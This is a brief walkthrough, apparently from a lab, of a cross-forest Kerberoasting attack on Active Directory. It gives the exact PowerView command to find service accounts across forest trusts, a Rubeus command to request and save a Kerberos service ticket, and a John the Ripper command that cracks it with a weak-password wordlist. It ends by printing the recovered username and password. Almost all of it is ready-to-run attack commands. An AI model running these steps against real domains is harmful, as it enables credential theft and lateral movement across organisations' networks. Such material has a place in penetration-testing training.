We will learn how to exploit cross-forest Kerberoasting attack

Loading PowerView

 . .\\PowerView.ps1

Now let’s Find Kerberoastable users across the forest

Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName} | select samaccountname,serviceprincipalname

Notice that we got the user storagesvc is Kerberoastable

Now using Rubeus.exe to get TGS

.\\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:crosskerberoast.txt

As observed we got the hash of the user

Now cracking it with john

.\\john.exe ..\\..\\crosskerberoast.txt --wordlist=..\\..\\kerberoast\\10k-worst-pass.txt

and we got the password

username: storagesvc
password: Qwerty@123